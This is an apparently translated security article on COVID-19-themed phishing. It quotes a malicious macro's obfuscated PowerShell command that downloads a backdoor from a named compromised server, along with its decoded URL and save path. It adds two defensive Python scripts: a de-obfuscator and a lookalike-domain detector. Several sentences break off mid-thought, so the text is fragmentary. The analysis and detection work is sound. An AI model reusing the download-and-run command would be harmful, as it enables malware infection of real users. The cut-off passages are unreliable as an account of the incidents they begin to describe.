Attackers continue to exploit the topic of COVID-19, creating more and more new threats for users who are keenly interested in everything related to the epidemic. IN
Remember in
Would you like a free COVID-19 test?
Another prominent example of coronavirus-themed phishing was
Convincing most users to enable macros was also easy, using a standard trick: to fill out the questionnaire, the user must first enable macros, which means running the VBA script.
As can be seen, the VBA script is deliberately obfuscated to evade antivirus detection.
Windows' built-in choice command can be used as a timer: with /D Y /T <seconds> it waits the given number of seconds and then accepts "Y" as the default answer. In this case the script waited 65 seconds before deleting its temporary files:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
While it waited, the malware was downloaded by a separate PowerShell command:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
After decoding the Base64 values, the PowerShell command downloads a backdoor hosted on a previously compromised web server in Germany:
http://automatischer-staubsauger.com/feature/777777.png
and saves it as:
C:\Users\Public\tmpdir\file1.exe
The folder 'C:\Users\Public\tmpdir' is created when the file 'tmps1.bat' is run; that file contains the command cmd /c mkdir ""C:\Users\Public\tmpdir"".
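For triage of a dropper like the one above, an analyst wants the obfuscation peeled back automatically: decode the Base64 literals, fold the '1' + '.e' + 'x' + 'e' concatenation back into a file name, and pull out the timer and clean-up targets. The following script is an added example, not code from the original article; it runs over the two command lines quoted above (copied from the page, backslashes restored, the stray space in "[System.Convert]::" removed) and handles the general case of any ASCII.GetString(FromBase64String('...')) wrapper and any run of '+'-joined string fragments, not just this sample.

```python
import base64
import re

# Command lines recovered from the macro described above (copied from the page).
SAMPLE_CLEANUP = (
    r"cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat"
    r" & del C:\Users\Public\1.txt"
)
SAMPLE_DOWNLOAD = (
    r'cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile('
    r"[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
    r"'aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), "
    r"[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
    r"'QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') "
    r">C:\Users\Public\1.txt"
)

# ASCII.GetString(FromBase64String('...')) wrapper around one Base64 literal.
B64_WRAPPER = re.compile(
    r"\[System\.Text\.Encoding\]::ASCII\.GetString\("
    r"\[System\.Convert\]\s*::\s*FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)\)"
)
# A run of single-quoted fragments joined with '+', e.g. '1' + '.e' + 'x' + 'e'.
CONCAT = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')+")
LITERAL = re.compile(r"'([^']*)'")
# DownloadFile(url, destination) once both arguments are plain literals.
DOWNLOAD_ARGS = re.compile(r"DownloadFile\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)")
# choice ... /T <seconds> used as a sleep; stop at the next && / & / | separator.
CHOICE_DELAY = re.compile(r"\bchoice\b[^&|]*?/T\s+(\d+)", re.IGNORECASE)
DEL_TARGET = re.compile(r"\bdel\s+(\S+)", re.IGNORECASE)


def decode_base64_wrappers(cmd: str) -> str:
    """Replace every ASCII.GetString(FromBase64String('...')) with the decoded literal."""
    def repl(m):
        try:
            return "'" + base64.b64decode(m.group(1), validate=True).decode("ascii") + "'"
        except (ValueError, UnicodeDecodeError):
            return m.group(0)  # leave undecodable blobs untouched for manual review
    return B64_WRAPPER.sub(repl, cmd)


def collapse_concatenation(ps: str) -> str:
    """Fold 'a' + 'b' + 'c' into 'abc' (PowerShell single quotes are literal)."""
    return CONCAT.sub(lambda m: "'" + "".join(LITERAL.findall(m.group(0))) + "'", ps)


def analyse_download(cmd: str) -> dict:
    """Return the raw Base64 blobs, the de-obfuscated command, and the URL/destination."""
    simplified = collapse_concatenation(decode_base64_wrappers(cmd))
    m = DOWNLOAD_ARGS.search(simplified)
    return {
        "base64_blobs": B64_WRAPPER.findall(cmd),
        "simplified": simplified,
        "url": m.group(1) if m else None,
        "dest": m.group(2) if m else None,
    }


def choice_delay_seconds(cmd: str):
    """Seconds the 'choice /T' timer sleeps before the rest of the line runs."""
    m = CHOICE_DELAY.search(cmd)
    return int(m.group(1)) if m else None


def deleted_paths(cmd: str) -> list:
    """Files removed by 'del' in the clean-up line (anti-forensics hints)."""
    return DEL_TARGET.findall(cmd)


if __name__ == "__main__":
    report = analyse_download(SAMPLE_DOWNLOAD)
    print("download URL:", report["url"])
    print("saved as    :", report["dest"])
    print("delay (s)   :", choice_delay_seconds(SAMPLE_CLEANUP))
    print("deleted     :", deleted_paths(SAMPLE_CLEANUP))
```

The same three patterns (Base64-wrapped strings, chopped-up file names, a choice-based sleep followed by del) are worth encoding as detection logic over process-creation telemetry: a powershell child of cmd.exe or winword.exe whose command line contains FromBase64String together with DownloadFile is a strong signal on its own, and a choice /T with a long timeout in an office-spawned cmd.exe is rarely legitimate.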
Targeted attack on state structures
In addition, FireEye analysts recently reported a targeted APT32 attack aimed at government bodies in Wuhan as well as the Chinese Ministry of Emergency Management. One of the distributed RTF files included a link to a New York Times article titled
Interestingly, at the time of discovery none of the antivirus engines on VirusTotal detected this sample.
When official sites are down
The clearest example of a phishing attack happened in Russia just the other day. The trigger was the introduction of a long-awaited allowance for children aged 3 to 16. When the start of accepting applications was announced on May 12, 2020, millions rushed to the Gosuslugi website for the long-awaited help and brought the portal down as effectively as a professional DDoS attack. After the president said that "Government Services failed to cope with the flow of applications," word spread online that an alternative site for accepting applications had been launched.
The problem is that several sites have started working at once, and while one, the real one at posobie16.gosuslugi.ru, really accepts applications, yet
Colleagues from SearchInform found about 30 new fraudulent domains in the .ru zone. Infosecurity, a Softline company, has tracked more than 70 similar fake government-services sites since the beginning of April. Their creators play on the familiar branding and use combinations of the words gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, and so on.
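A brand-protection or SOC team typically watches new registrations for exactly this vocabulary. The script below is an added example, not code from the article or from SearchInform or Infosecurity; it flags hostnames that use the keywords listed above outside the legitimate gosuslugi.ru zone, and additionally catches two tricks the keyword match alone would miss: punycode (IDN) labels and Latin/Cyrillic homoglyph mixing. The sample hosts other than posobie16.gosuslugi.ru and habr.com are constructed placeholders under the reserved .example TLD.

```python
import unicodedata

# The zone the fraudulent sites impersonate (from the page).
LEGITIMATE_ZONES = {"gosuslugi.ru"}
# Vocabulary the page reports the fake sites combining.
BRAND_KEYWORDS = ("gosuslugi", "vyplaty", "posobie", "covid")


def registrable_domain(host: str) -> str:
    """Naive eTLD+1: the last two labels. Fine for .ru/.com; use a public-suffix
    list for zones such as .co.uk."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def has_mixed_script(host: str) -> bool:
    """True when letters from more than one script (e.g. Latin + Cyrillic) appear,
    the classic homoglyph lookalike."""
    scripts = set()
    for ch in host:
        if not ch.isalpha():
            continue
        name = unicodedata.name(ch, "")
        if name.startswith("LATIN"):
            scripts.add("LATIN")
        elif name.startswith("CYRILLIC"):
            scripts.add("CYRILLIC")
        else:
            scripts.add("OTHER")
    return len(scripts) > 1


def suspicion_reasons(host: str) -> list:
    """Return the list of reasons a host looks like a government-services lookalike
    (empty list = nothing suspicious or host is inside the legitimate zone)."""
    host = host.lower().strip(".")
    if registrable_domain(host) in LEGITIMATE_ZONES:
        return []
    reasons = []
    if any(k in host for k in BRAND_KEYWORDS):
        reasons.append("brand keyword outside legitimate zone")
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode/IDN label")
    if has_mixed_script(host):
        reasons.append("mixed Latin/Cyrillic letters")
    return reasons


def triage(hosts) -> dict:
    """Map each host to its reasons; hosts with an empty list can be dropped."""
    return {h: suspicion_reasons(h) for h in hosts}


# Constructed sample feed (only the first and last hosts are real names from the page).
SAMPLE_HOSTS = [
    "posobie16.gosuslugi.ru",        # the genuine portal
    "gosuslugi-16.example",          # placeholder lookalike using the page's vocabulary
    "covid-vyplaty.example",         # placeholder lookalike
    "g\u043esuslugi.example",        # placeholder with a Cyrillic 'о' replacing Latin 'o'
    "xn--placeholder.example",       # placeholder punycode label
    "habr.com",                      # unrelated, should pass
]

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_HOSTS).items():
        print(f"{host:30} {'OK' if not reasons else '; '.join(reasons)}")
```

Note that the homoglyph host is not caught by the keyword test at all, because "gosuslugi" spelled with a Cyrillic о is a different string; that is why the script check is a separate rule rather than a fuzzier keyword match.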
Hype and social engineering
All these examples only confirm that attackers are successfully monetizing the coronavirus theme. And the higher the social tension and the more unresolved questions there are, the more likely scammers are to steal important data, get people to hand over their money themselves, or simply compromise more computers.
And given that the pandemic has forced potentially unprepared people to work from home en masse, not only personal but also corporate data are at risk. For example, Microsoft 365 (formerly Office 365) users were also recently targeted by phishing. Many people received "missed" voice messages as e-mail attachments. In fact, the files were an HTML page that sent the victims of the attack to
Source: habr.com